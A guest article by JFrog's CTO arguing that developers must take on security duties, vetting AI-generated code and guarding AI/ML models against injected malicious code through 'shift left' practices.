From Innovation to Protection: Developers' Crucial Role in Securing AI and ML Models

Guest author Yoav Landman, Founder and CTO of JFrog, explains that while the potential for innovation with AI/ML is vast, it brings about heightened concerns for developers

Yoav Landman. Photo courtesy JFrog

As the scope of AI expands and large language models (LLMs) become more commonplace, developers are increasingly tasked with integrating AI and ML models into their software updates or developing entirely new software. While the potential for innovation with AI/ML is vast, it brings about heightened concerns as developers often struggle to prioritize secure development due to bandwidth constraints

Lapses in security can unintentionally introduce malicious code into AI/ML models – opening the door for threat actors to lure developers to consume OSS model variants, infiltrate corporate networks, and inflict further damage on an organization.

What’s more, developers are increasingly turning to generative AI to create code without knowing if the code they generate is compromised. This again can perpetuate security threats. Code must be vetted properly from the start to proactively mitigate the threat of damage to the software supply chain.

These threats will continue to plague security teams as threat actors seek out ways to exploit AI/ML models at every turn. As security threats rise in number and scale, 2024 will require developers to embrace security in their job functions and deploy the necessary safeguards to ensure resiliency for the organization.

Transforming the Developer Role

Integrating security considerations at the inception of the software lifecycle is a relatively recent practice for developers. Often, security at the binary level is viewed as a non-essential aspect. Threat actors exploit this oversight, seeking ways to weaponize ML models against organizations by injecting malicious logic into the end binary

Likewise, many developers do not have the necessary training to embed security into their code during the beginning stages of development. The main impact of this is that code generated by AI, trained on open-source repositories is often not properly vetted for vulnerabilities and lacks holistic security controls to protect users and their organizations from exploitation.

Though it might save time and other resources in their job function, developers are unwittingly exposing the organization to numerous risks. Once that code is implemented in AI/ML models those exploitations are only made more impactful and can then go undetected.

As we advance into 2024, the conventional developer role must evolve to meet the demands of an ever-changing security landscape. Developers must assume the role of security professionals, blurring the lines between DevOps and DevSecOps. By incorporating secure solutions from the outset, developers not only optimize critical workflows but also instill confidence in organizational security

Shift Left" for Proactive Safeguards"

The security of ML models must continue to evolve if security teams are to remain vigilant against threats in the new year. However, as AI gets implemented at scale, teams can’t afford to identify the necessary security measures later in the software lifecycle ­­– by then, it might be too late.

Security leaders across the organization must embody the “shift left” mentality for software development. Adhering to this approach can ensure all components of the software development lifecycle are secure from the start and improve an organization’s security posture overall. When applied to AI/ML, shift-left not only confirms if code developed in external AI/ML systems is secure, but it also ensures the AI/ML models being developed are free of malicious code and are license-compliant.

Approaching 2024 and beyond, threats surrounding AI and ML models will persist. Ensuring security is ingrained from the initiation of the software lifecycle will be critical for consistently thwarting attacks and safeguarding organizations and their customers.

Written by Yoav Landman, Founder and CTO of JFrog

img
Rare-earth elements between the United States of America and the People's Republic of China
The Eastern seas after Afghanistan: the UK and Australia come to the rescue of the United States in a clumsy way
The failure of the great games in Afghanistan from the 19th century to the present day
Russia, Turkey and United Arab Emirates. The intelligence services organize and investigate